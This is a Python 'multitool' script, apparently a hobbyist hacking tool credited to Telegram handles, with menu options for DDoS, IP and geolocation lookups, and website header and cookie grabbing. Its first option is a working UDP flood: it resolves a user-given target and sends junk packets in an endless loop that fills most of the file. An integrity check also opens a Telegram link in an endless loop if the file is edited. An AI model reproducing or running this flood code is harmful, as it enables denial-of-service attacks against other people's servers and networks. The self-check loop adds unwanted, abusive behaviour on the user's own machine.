import os.path,requests,socket,webbrowser
r=requests.session()
gr = "\033[1;32m"
re = "\033[1;31m"
cy = "\033[1;36m"
do = '\033[1;37m'
so = '\033[1;35m'
po = '\033[1;38m'
file = 'V2_F1.py'
file_size =os.path.getsize(file)
filza=int(17410)
if filza == file_size:
     print(f"{re}DEV @Filza_507 __{cy}__ @TweakPY")
     print(f"""
       {gr}  ██╗░░░██╗██████╗░███████╗░░███╗░░
       {po}  ██║░░░██║╚════██╗██╔════╝░████║░░
       {re}  ╚██╗░██╔╝░░███╔═╝█████╗░░██╔██║░░
       {cy}  ░╚████╔╝░██╔══╝░░██╔══╝░░╚═╝██║░░
       {po}  ░░╚██╔╝░░███████╗██║░░░░░███████     
                """)
     print(f"""
     {gr}- {po}1*[DDOS]
     {gr}- {po}2*[GET IP]
     {gr}- {po}3*[GET IP INFO]
     {gr}- {po}4*[GET WEBSITE INFO]
     {gr}- {po}5*[GET IP FULL INFO ]
     {gr}- {po}6*[GET NUMBER INFO :KSA:]
     {gr}- {po}99*[exit program]
     """)
     print("Enter number")
     mod = input(">> ")
     if mod=="1":
         global vv1ck
         print("======================================")
         print(f"{re}ddos Attack 🚀")
         print("======================================")
         print(f"{po} Enter Target url or Ip  ")
         target = input(">> ")
         print(f"{po}Enter port")
         port1 = input('>> ')
         target.replace("http://", "")
         target.replace("https://", "")
         target.replace("www.", "")
         ip = socket.gethostbyname(target)
         port = int(port1)
         vv1ck = "jlllllllllllllkkkkkkkkkkkkkkkkkkkkkkkjllllllllllllllllllllllllllllllllllllllllkkkkkkkkkkkkkkkkkkkkkklllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmskskskskskks"
         while True:
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, f"{re}<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.sendto(bytes(vv1ck, "UTF-8"), (ip, port))
             print(port, "<======>", ip)
     elif mod=='2':
         print("Enter site or link or url")
         IPS=input(po+'>> ')
         sop = socket.gethostbyname(IPS)
         print(re+sop)
     elif mod=='3':
        print(po+"""
         [1] Get My IP & data
         [2] Get Location & data From IP Target
         """)
        j = input(po+">> ")
        if j == "1":
            IPrequest = requests.get("https://get.geojs.io/v1/ip.json")
            myIP = IPrequest.json()["ip"]
            LocationR = requests.get("https://get.geojs.io/v1/ip/geo/" + myIP + ".json")
            GetLocate = LocationR.json()
            print(re+">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
            print("My IP Address      : " + GetLocate["ip"])
            print("My Location        : " + GetLocate["country"])
            print("My Country Code    : " + GetLocate["country_code"])
            print("Service Provider   : " + GetLocate["organization_name"])
            print("Time Zone          : " + GetLocate["timezone"])
            print("Longitude On a map : " + GetLocate["longitude"])
            print("Latitude On a map  : " + GetLocate["latitude"])
        elif j == "2":
            print(po+"Enter The ip  ")
            z = input(">> ")
            LocationR = requests.get("https://get.geojs.io/v1/ip/geo/" + z + ".json")
            GetLocate = LocationR.json()
            print(re+">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
            print("Target IP Address         : " + GetLocate["ip"])
            print("Target Location           : " + GetLocate["country"])
            print("Target Country Code       : " + GetLocate["country_code"])
            print("Target Time Zone          : " + GetLocate["timezone"])
            print("Target Longitude On a map : " + GetLocate["longitude"])
            print("Target Latitude On a map  : " + GetLocate["latitude"])
            print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
     elif mod == '4':
         print(re+'=======================================')
         print('WEBSITE URL')
         will = input(po+">> ")
         print('=======================================')
         url = will
         filza = requests.get(url)
         FID = filza.content
         content = (FID)
         LHK = requests.get(url)
         filza5555 = requests.get(url)
         cokies = (filza.cookies)
         WeB = requests.get(url)
         head = (WeB.headers)
         with open("WEBS_INFO", 'a') as x:
             x.write(f'{FID}\n{content}\n{head}\n{cokies}\n{LHK}\n{filza5555}')
             print(so + '*-- done  --*')
     elif mod == '5':
         print('IP')
         ip = input(">> "+re)
         print("Enter ip")
         url=f'https://ipinfo.io/{ip}'
         req = requests.get(url)
         print(re+req.text)
         with open("IP_INFO.md", 'a') as x:
         	x.write(f'{req.text}')
     elif mod == '6':
        webbrowser.open('https://storage.googleapis.com/ksa-n/index.html')
     elif mod == '99':
         quit(0)
else:
    while True:
        webbrowser.open("https:\\t.me\TweakPY")
        print(re + '[' + re + '!' + re + ']' + re + ' ERROR THE you change the file ')
        print(re + 'Error' + '\n')
        print(re + '[' + re + '!' + re + ']' + re + ' ERROR THE you change the file ')
